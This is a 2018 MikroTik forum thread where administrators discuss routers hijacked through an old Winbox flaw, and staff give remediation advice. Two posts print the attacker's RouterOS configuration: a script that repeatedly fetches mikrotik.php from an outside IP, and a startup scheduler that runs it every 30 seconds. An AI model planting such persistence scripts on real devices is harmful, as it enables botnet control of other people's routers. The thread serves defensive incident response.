Community discussions

 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Mikrotik.php file scripts

Thu Jul 26, 2018 10:44 am

HI,

Normis, before you close this topic, im not interested in how they got in, but what they want.
As seen in topic viewtopic.php?f=9&t=137217 the past few days a vast number of non-up-to-date Mikrotik devices has been compromised.
(not blaming Mikrotik, we should have updated)

Like Normis stated at the last post, the hacker could have collected passwords way before hand and used them now.
We took the action to remove scripts, schedulers and disable IP>Socks, then use firewall filter to block all incoming WAN traffic from non-whitelisted sources and updated to 6.40.8.
I know that a clean Netinstall would be the best course of action, but we have devices spread over the whole of Europe, so that's easier said than done.

But i am wondering, what was the goal of this?
This is what i have found (not an hacking expert)
- Scheduler is used to run a script every 30 seconds
- Script is used to fetch mikrotik.php from several IP addresses
- There are different versions of the hack, or several steps, mostly i found script3_ under scripts, but i have also found script1_ in one occasion.
(deleted it, without proper examination.... sorry panic mode )
- The source where mikrotik.php was downloaded has gone, so no way to see what was in the mikrotik.php file.
- IP > Socks is set to enabled on port 4145
[edit] - All drop rules in firewall filters have been disabled
Thats all we found, anybody got anything else that we have missed?

So if they already had the login credentials, then what did they do with mikrotik.php?
And did it infect the device on a shell level? (does upgrading fix that if that would be the case)

Since taking above said steps, i have not noticed any strange behavior, but it has only been 24h.
Did anybody get further in what has exactly been changed in the devices?

Br,
Ammer
 
User avatar
genesispro
Member Candidate
Member Candidate
Posts: 135
Joined: Fri Mar 14, 2014 12:33 pm

Re: Mikrotik.php file scripts

Thu Jul 26, 2018 2:23 pm

I used the following command in the dude to fix the sock changes made
[ros_command("/ip socks set enabled=no port=1080")]

I am also trying to enable all drop firewalls using
[ros_command("/ip firewall filter enable [/ip firewall filter find where action=drop]")]
but it doesn't work.
Anyone knows why?

if I run the command
/ip firewall filter enable [/ip firewall filter find where action=drop]
in the cli it works fine

I used the dude to apply it to all of the devices that I manage at once
 
aramob
just joined
Posts: 1
Joined: Fri Jul 27, 2018 8:03 pm

Re: Mikrotik.php file scripts

Sat Jul 28, 2018 12:03 am

I got the same problem, yesterday I found attempts of connections:
Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
And then this:
/system script
add name=script3_ owner=adminAC policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
o"
/system scheduler
add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup

immediately, I change all passwords and users, change the Winbox port and add a whitelist for Winbox connections (My local network and my works public IP).
Does anyone have an idea of ​​what we could do in order to protect ourselves?

Greetings
 
berzins
just joined
Posts: 10
Joined: Thu Apr 05, 2018 2:46 pm

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 11:53 am

I got the same problem, yesterday I found attempts of connections:
Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
And then this:
/system script
add name=script3_ owner=adminAC policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
o"
/system scheduler
add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup

immediately, I change all passwords and users, change the Winbox port and add a whitelist for Winbox connections (My local network and my works public IP).
Does anyone have an idea of ​​what we could do in order to protect ourselves?

Greetings
It's a known exploit that was fixed months ago, all you have to do is what normis said:
1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 12:04 pm

The first topic is actually about something else, this is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:
Issue was fixed in March already.
https://blog.mikrotik.com

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
As to the original post, yes, it is a nice question. We currently don't have full picture of how this thing operates. You are welcome to research and post your ideas and findings.
All we currently know is what method it used to get inside your device and how to protect the device.
No answer to your question? How to write posts
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Mon Jul 30, 2018 12:24 pm

The first topic is actually about something else, this is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:
Issue was fixed in March already.
https://blog.mikrotik.com

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
As to the original post, yes, it is a nice question. We currently don't have full picture of how this thing operates. You are welcome to research and post your ideas and findings.
All we currently know is what method it used to get inside your device and how to protect the device.
Hi Normis,

You can close the topic, as it doesn't seem to get replies that are actually on-topic.
(I feel for your support staff, seeing the forum replies blatantly ignoring the update and password instruction while claiming new versions were hacked)

For as far as i can see the hack was preparing the units for use in a botnet.
The mikrotik.php file was non-exiting, but the fact that it was downloaded every 30 seconds suggests that whenever they wanted to attack they would post instruction in the mikrotik.php file and let the infected units execute these instructions.
I think IP>Socks was opened in order to provide a backdoor in case the firewall rules were tightened. (if i'm correct IP > Socks give you a way to bypass the firewall??)

Anyway we upgraded all our units to 6.40.8 and blocked all non-whitelisted traffic from WAN, and so far i have not seen any re-infected units. (user/password update we will do next)

Cheers.
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 6:54 am

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this
Image
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1303
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 8:00 am

For some reason I do not see the picture, but I see the link, so I downloaded the picture.
Always upload picture to the site, click attachments button below.
.
mikrotik-fuck-hacker.jpg
You do not have the required permissions to view the files attached to this post.
 
How to use Splunk to monitor your MikroTik Router

MikroTik->Splunk
 
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 8:21 am

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this
Image
Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.
No answer to your question? How to write posts
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:00 am

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this
Image
Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.
no I'm sure about that
this happened six hours ago from now
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:03 am

How do you know that nobody connected a month ago also?
No answer to your question? How to write posts
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:14 am

How do you know that nobody connected a month ago also?
because I upgraded the version a month ago and I always follow the router and I know very well my RouerOS
I always follow this bug from 6 month ago, and i know it , and i know the program can do this, but if i disable port www the program can't get the password and in 6.40.8 the bug solved,

today alot of routerOS hacked , i think there is new bug
if i can talking to you on the email i will give you some things
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:19 am

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.
No answer to your question? How to write posts
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 9:38 am

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.
I hope so but believe me this happened after the upgrade
use script or scheduler or fetch is primitive, i can use trick much better than this to login winbox after change password or upgrade without feeling the owner of router
I have more than 200 Router Board , control it by cloud
i have a company , and my business depends on mikrotik RouterOS
Please email me or facebook
it@max-upgrade.com
https://www.facebook.com/profile.php?id=100001210286834
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:13 am

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.
some RouterBorad found this traying login
he cant hack it because my password contains arabic characters
with arabic characters cant get password until from backup file without encrypt
Image
this photo from yesterda
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:18 am

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:23 am

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that
Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:24 am

And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.
No answer to your question? How to write posts
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:32 am

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that
Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.
hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:34 am

And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.
of course
the default config is opened
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:35 am

No, default config has firewall on the internet port.
No answer to your question? How to write posts
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:43 am

No, default config has firewall on the internet port.
i mean the default config of bandwidth-test port "2000" is opend
the firewall filter you talking about has exception for winbox port 8291
and the Vulnerability exploiting the Winbox port you said that
on last photo the version 6.40.9
and it may solve the problem
 
Ammer
just joined
Topic Author
Posts: 15
Joined: Mon Dec 16, 2013 12:49 pm

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:46 am

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that
Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.
hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers
Hi,
If you have a RouterOS device at home, just enable IP>cloud and it will give you a DNS record you can use to whitelist your IP address.
We have a x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes.
And whitelists IP addresses that successfully connect a SSTP tunnel.
This way we can reach all our devices and only have 1 device that is connectable from the internet.

Another way is to limit winbox access from the internet bij allowing access only from certain IP's.
(@ Normis, winbox can only be limited by IP address, not by DNS... maybe nice feature to be able to limit Winbox to DNS records for people without static IP addresses)
 
User avatar
ahmedalmi
Frequent Visitor
Frequent Visitor
Posts: 77
Joined: Sat Sep 13, 2014 5:52 pm
Location: sana'a yemen
Contact:

Re: Mikrotik.php file scripts

Tue Aug 28, 2018 10:55 am

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that
Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.
hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers
Hi,
If you have a RouterOS device at home, just enable IP>cloud and it will give you a DNS record you can use to whitelist your IP address.
We have a x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes.
And whitelists IP addresses that successfully connect a SSTP tunnel.
This way we can reach all our devices and only have 1 device that is connectable from the internet.

Another way is to limit winbox access from the internet bij allowing access only from certain IP's.
(@ Normis, winbox can only be limited by IP address, not by DNS... maybe nice feature to be able to limit Winbox to DNS records for people without static IP addresses)

you right , but on home i haven't rouerOS and my customers want to login by cloud from android sometime using 3g or 4g
its a little difficult like i said

about winbox can only be limited by IP address, not by DNS , you can use scheduler to resolve dns and set it on winbox service ip address
 
wpeople
Member
Member
Posts: 352
Joined: Sat May 26, 2007 6:36 pm

Re: Mikrotik.php file scripts

Mon Sep 03, 2018 11:38 pm

if you don't want to mess with VPN clients, than use port knock.
There are (free) clients for almost any platform. Just send some packets in specific order, and it will open up the ports FOR YOU for the time you specifed.
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24206
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik.php file scripts

Tue Sep 04, 2018 2:46 pm

No, default config has firewall on the internet port.
i mean the default config of bandwidth-test port "2000" is opend
the firewall filter you talking about has exception for winbox port 8291
and the Vulnerability exploiting the Winbox port you said that
on last photo the version 6.40.9
and it may solve the problem
No, it is not open on the internet port. Default firewall blocks ALL incoming traffic from internet, it also blocks bandwidth test.
No answer to your question? How to write posts
 
ramiaburas2011
just joined
Posts: 1
Joined: Wed Sep 05, 2018 6:28 pm

Re: Mikrotik.php file scripts

Wed Sep 05, 2018 6:35 pm

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this
Image
Ahmed
Im Rami Aburas from Ibb city
This found in my router
Scrript 4_
وموجود يشتغل في سكجول

Who is online

Users browsing this forum: MSN [Bot] and 8 guests